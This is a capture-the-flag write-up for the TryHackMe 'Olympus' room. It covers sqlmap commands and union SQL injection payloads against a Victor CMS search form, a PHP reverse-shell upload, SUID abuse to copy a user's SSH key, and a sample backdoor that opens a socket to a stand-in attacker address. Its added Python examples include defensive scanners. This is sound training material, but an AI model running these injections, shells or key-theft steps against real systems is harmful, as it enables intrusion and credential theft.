---
# System prepended metadata

title: THM-Olympus
tags: [TryHackMe]

---

# THM-Olympus
![image](https://hackmd.io/_uploads/B11hedl0ll.png)
![image](https://hackmd.io/_uploads/HJd2eulCge.png)
![image](https://hackmd.io/_uploads/H1y7Q_e0xl.png)
![image](https://hackmd.io/_uploads/B14_-uxAgx.png)
![image](https://hackmd.io/_uploads/HJXSHugClg.png)
![image](https://hackmd.io/_uploads/B1K3rOgRxg.png)
The site runs Victor CMS, which has a known SQL injection:
![image](https://hackmd.io/_uploads/ryuMw_e0xg.png)
https://www.exploit-db.com/exploits/48734
![image](https://hackmd.io/_uploads/Byzrwux0gl.png)
This is a union-based SQL injection in the `search` POST parameter of `search.php`.
I use sqlmap to dump the database; the `*` in `--data` marks the injection point.
```
sqlmap -u "http://olympus.thm/~webmaster/search.php" --data="search=1337*&submit=" --dbs --random-agent -v 3
```
![image](https://hackmd.io/_uploads/SkIiOdx0xe.png)
![image](https://hackmd.io/_uploads/BybAu_gAel.png)
```
sqlmap -u "http://olympus.thm/~webmaster/search.php" --data="search=1337*&submit=" --dbs -D olympus --tables --random-agent -v 3
```
![image](https://hackmd.io/_uploads/SyaZtug0xx.png)
```
sqlmap -u "http://olympus.thm/~webmaster/search.php" --data="search=1337*&submit=" -D olympus -T chats --columns --random-agent -v 3
```
![image](https://hackmd.io/_uploads/H1RPtOgAgl.png)
![image](https://hackmd.io/_uploads/HkdOFdgCll.png)
```
sqlmap -u "http://olympus.thm/~webmaster/search.php" --data="search=1337*&submit=" -D olympus -T flag --columns --dump --random-agent -v 3
```
![image](https://hackmd.io/_uploads/H1jaFOe0eg.png)
![image](https://hackmd.io/_uploads/SyiCYueCex.png)
![image](https://hackmd.io/_uploads/HkAJ5uxRex.png)
![image](https://hackmd.io/_uploads/r1cecOxCge.png)
![image](https://hackmd.io/_uploads/B1VZqOxRlx.png)
![image](https://hackmd.io/_uploads/SJRbq_xAle.png)
Let's crack the password hashes from the users table.
![image](https://hackmd.io/_uploads/B1VhsOxCel.png)
Of the three hashes, only one cracks: prometheus:summertime
![image](https://hackmd.io/_uploads/ryn03_lCxg.png)
Then I log in to the admin panel as prometheus; the site itself has no interesting information.
![image](https://hackmd.io/_uploads/HkU8aOe0eg.png)
The email mentions a new hostname, chat.olympus.thm; add it to /etc/hosts.
![image](https://hackmd.io/_uploads/rkm60ueCgg.png)
There I find a login page.
![image](https://hackmd.io/_uploads/Byu7xYx0el.png)
![image](https://hackmd.io/_uploads/Hk6okKxAee.png)
Use prometheus's credentials to log in and read the earlier messages he exchanged with Zeus.
![image](https://hackmd.io/_uploads/r16AJYgClg.png)
Looking at the discussion, it seems that Prometheus tried to upload a file to the server and download it back, probably to find out whether a PHP shell could be uploaded this way. This didn't work, because the developer implemented filename randomization on the uploaded files.
We can also upload any file we want, and a quick try shows that the documents are probably stored in /uploads, but just like Prometheus, we can't seem to access them afterwards. We need to find a way to learn the names the uploaded files now have.
Let's create a PHP reverse shell.
![image](https://hackmd.io/_uploads/B1CkWYl0xe.png)
If we go back to the database we dumped earlier, there is a table named "chats". Looking at it, we see the following:
![image](https://hackmd.io/_uploads/rJ5MWtlRge.png)
The `file` column records the randomized name of each upload, so with that name I can access the uploaded file.
![image](https://hackmd.io/_uploads/H1vX7FxAee.png)
I upload shell.php through the chat on the website, then pull its stored name out of the chats table:
![image](https://hackmd.io/_uploads/SkfsPYeCee.png)
```
sqlmap -u "http://olympus.thm/~webmaster/search.php" --data="search=1337*&submit=" --batch -D olympus -T chats -C file,dt --dump
```
![image](https://hackmd.io/_uploads/S1YL_YxAel.png)
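The two database steps above (the union-based injection in `search.php`, and the chats table leaking the randomized upload names) can be reproduced end to end against a small in-memory SQLite model. This is an added example, not Victor CMS code or the room's real schema: the table names follow the write-up, the column names and the hash strings are made up, and `find_column_count` / `union_dump` are the manual form of what sqlmap does with `-D olympus -T chats -C file,dt`. The parameterized `search_safe` beside it shows why the same payload fails once the term is bound instead of concatenated.

```python
import secrets
import sqlite3

# Constructed stand-in for the dumped CMS database. Table names follow the
# write-up; the column names and every value in it are made up for this example.
def build_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE posts (p_id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE users (u_id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        CREATE TABLE chats (c_id INTEGER PRIMARY KEY, sender TEXT, msg TEXT,
                            file TEXT, dt TEXT);
    """)
    con.executemany("INSERT INTO posts (title, body) VALUES (?, ?)",
                    [("Welcome to Olympus", "first post"), ("News", "more news")])
    con.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                    [("prometheus", "$2y$10$constructed_hash_1"),   # constructed, not a real hash
                     ("zeus", "$2y$10$constructed_hash_2")])
    return con

def search_vulnerable(con, term):
    """The CMS builds the query by string concatenation, so `term` becomes SQL."""
    sql = f"SELECT p_id, title, body FROM posts WHERE title LIKE '%{term}%'"
    return con.execute(sql).fetchall()

def search_safe(con, term):
    """Same query with a bound parameter: the term can never become SQL."""
    sql = "SELECT p_id, title, body FROM posts WHERE title LIKE ?"
    return con.execute(sql, (f"%{term}%",)).fetchall()

def store_upload(con, sender, msg, original_name):
    """Mimic the chat upload: the file gets a random name on disk, but the
    chats table still records that name, which is what the injection leaks."""
    ext = original_name.rsplit(".", 1)[-1]
    stored = f"{secrets.token_hex(6)}.{ext}"
    con.execute("INSERT INTO chats (sender, msg, file, dt) "
                "VALUES (?, ?, ?, datetime('now'))", (sender, msg, stored))
    return stored

def find_column_count(search, con, max_cols=20):
    """Step 1 of a UNION attack: ORDER BY n errors once n exceeds the column count.
    Returns None when no probe errors, i.e. the parameter is not injectable."""
    for n in range(1, max_cols + 1):
        try:
            search(con, f"nomatch' ORDER BY {n}-- -")
        except sqlite3.OperationalError:
            return n - 1
    return None

def union_dump(search, con, ncols, table, cols):
    """Step 2: pad a UNION SELECT with NULLs to ncols and read another table.
    'nomatch' keeps the original query's own rows out of the result."""
    select = ", ".join(cols + ["NULL"] * (ncols - len(cols)))
    rows = search(con, f"nomatch' UNION SELECT {select} FROM {table}-- -")
    return [row[:len(cols)] for row in rows]

if __name__ == "__main__":
    con = build_db()
    n = find_column_count(search_vulnerable, con)
    print("columns in the search query:", n)
    print("users:", union_dump(search_vulnerable, con, n, "users", ["username", "password"]))
    store_upload(con, "prometheus", "testing uploads", "shell.php")
    print("chats:", union_dump(search_vulnerable, con, n, "chats", ["file", "dt"]))
    payload = "nomatch' UNION SELECT username, password, NULL FROM users-- -"
    print("same payload against the bound query:", search_safe(con, payload))
```

The lesson the room builds on is visible in the last two prints: randomizing upload names only hides them from a directory guess, not from anyone who can read the table that stores them.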
Open the PHP file via /uploads and get a reverse shell.
![image](https://hackmd.io/_uploads/r1NcdFeRee.png)
![image](https://hackmd.io/_uploads/BJk_KtxAge.png)
Our current user cannot use sudo, so this way is out. We can try to look for SUID binaries with this command :
```
find / -perm -u=s -type f 2>/dev/null
```
![image](https://hackmd.io/_uploads/rJUEjFg0el.png)
I find the usual binaries such as /usr/bin/su or /usr/bin/umount, but one of them is something I don't usually see: /usr/bin/cputils.
The file is interesting because it is SUID and runs as zeus, and its functionality is copying files.
I immediately got the idea to copy zeus's private SSH key so that I can log in as zeus.
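The `find` above prints every SUID file; what makes cputils stand out is that it is not one of the standard set and is owned by a non-root user. The following is an added example (not part of the original write-up) that automates that triage: it walks the given roots, keeps setuid regular files, drops the names found on a stock Debian/Ubuntu install, and reports the owner each one would run as. The baseline list is an assumption for this example, not a complete reference, and the constructed entries in the test stand in for a real filesystem.

```python
import os
import pwd
import stat

# SUID binaries that are expected on a typical Debian/Ubuntu box. This set is an
# assumption for the example; extend it for the distro you are looking at.
USUAL_SUID = {
    "su", "sudo", "passwd", "chsh", "chfn", "gpasswd", "newgrp", "mount",
    "umount", "fusermount", "fusermount3", "pkexec", "ping", "at", "ssh-keysign",
    "dbus-daemon-launch-helper", "polkit-agent-helper-1",
}

def scan(roots):
    """Yield (path, st_mode, st_uid) for every entry under roots; unreadable
    entries are skipped, like the 2>/dev/null on the find command."""
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            for name in files:
                path = os.path.join(dirpath, name)
                try:
                    st = os.lstat(path)
                except OSError:
                    continue
                yield path, st.st_mode, st.st_uid

def _owner_name(uid):
    try:
        return pwd.getpwuid(uid).pw_name
    except KeyError:
        return str(uid)

def triage(entries, baseline=USUAL_SUID, resolve=_owner_name):
    """Return [(owner, path)] for SUID regular files whose basename is not in
    baseline. A SUID file owned by a non-root user (cputils -> zeus) still
    matters: it runs as that user, which is exactly the lateral move here."""
    shortlist = []
    for path, mode, uid in entries:
        if not (stat.S_ISREG(mode) and mode & stat.S_ISUID):
            continue
        if os.path.basename(path) in baseline:
            continue
        shortlist.append((resolve(uid), path))
    return shortlist

if __name__ == "__main__":
    for owner, path in triage(scan(["/usr/bin", "/usr/sbin", "/bin", "/sbin"])):
        print(f"{owner:12} {path}")
```

Run it as the low-privileged shell user; anything it prints is a candidate for the kind of abuse used against cputils, and the owner column tells you which account you would land as.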
![image](https://hackmd.io/_uploads/rJEx2tg0xx.png)
I save the key, convert it with ssh2john into a hash that john can crack, and crack the passphrase.
![image](https://hackmd.io/_uploads/r1r9nKlAxg.png)
Now SSH in as zeus.
![image](https://hackmd.io/_uploads/HJR-6KeCll.png)
In /var/www/html I find the file VIGQFQFMYOST.php, which looks like a reverse shell backdoor.
![image](https://hackmd.io/_uploads/Bk4PpYlCxx.png)
Looking at the code, it executes a very specific command: `uname -a; w; /lib/defended/libc.so.99`. Let’s see what happens when we run that last part ourselves.
![image](https://hackmd.io/_uploads/BkPsCKxCel.png)
![image](https://hackmd.io/_uploads/S1W3AKgRel.png)
![image](https://hackmd.io/_uploads/r1-KJcgRlg.png)
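Spotting that backdoor by eye works for one file; across a web root you want a quick scanner. This added example (not code from the room or the write-up) greps PHP source for command-execution, socket and obfuscation sinks and recovers the command string handed to the exec-style ones. The embedded `SAMPLE_PHP` is a constructed stand-in with the same shape as the backdoor described above, not the real VIGQFQFMYOST.php; the attacker address in it is made up, and the function names in `SINKS` are the usual suspects rather than an exhaustive list.

```python
import re

# Constructed sample in the shape of the backdoor found in /var/www/html.
# Not the real file: only the command string from the write-up is real.
SAMPLE_PHP = r'''<?php
$ip = '10.10.14.2';   // constructed attacker address
$port = 4444;
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
$shell = 'uname -a; w; /lib/defended/libc.so.99';
$process = proc_open($shell, array(0 => array("pipe","r"), 1 => array("pipe","w"), 2 => array("pipe","w")), $pipes);
'''

# PHP functions that run commands, open sockets or unpack hidden code.
EXEC_SINKS = ("shell_exec", "exec", "system", "passthru", "popen", "proc_open")
SINKS = EXEC_SINKS + ("fsockopen", "pfsockopen", "eval", "assert",
                      "base64_decode", "gzinflate", "str_rot13")
SINK_RE = re.compile(r"\b(" + "|".join(SINKS) + r")\s*\(")
# $name = 'literal'; assignments, used to resolve a variable passed to a sink
ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*(['\"])(.*?)\2\s*;")

def find_sinks(src):
    """Return [(line_no, function)] for every dangerous call in PHP source."""
    hits = []
    for n, line in enumerate(src.splitlines(), 1):
        for m in SINK_RE.finditer(line):
            hits.append((n, m.group(1)))
    return hits

def resolve_command(src, func):
    """Best effort: first argument of func(...); a $variable is replaced by the
    string literal last assigned to it, a quoted literal is returned as-is."""
    assigns = {name: val for name, _quote, val in ASSIGN_RE.findall(src)}
    m = re.search(r"\b" + re.escape(func) + r"\s*\(\s*([^,)]+)", src)
    if not m:
        return None
    arg = m.group(1).strip()
    if arg.startswith("$"):
        return assigns.get(arg[1:])
    return arg.strip("'\"")

def commands_in(src):
    """Ordered, de-duplicated command strings passed to exec-style sinks."""
    cmds = []
    for _n, func in find_sinks(src):
        if func in EXEC_SINKS:
            cmd = resolve_command(src, func)
            if cmd and cmd not in cmds:
                cmds.append(cmd)
    return cmds

if __name__ == "__main__":
    for line_no, func in find_sinks(SAMPLE_PHP):
        print(f"line {line_no}: {func}()")
    for cmd in commands_in(SAMPLE_PHP):
        print("command run by the shell:", cmd)
```

On a real box, feed it every .php under the web root and sort by hits; a randomly named file with a socket call and an exec sink next to each other is the pattern seen here, and the recovered command points straight at the next artifact to examine (/lib/defended/libc.so.99).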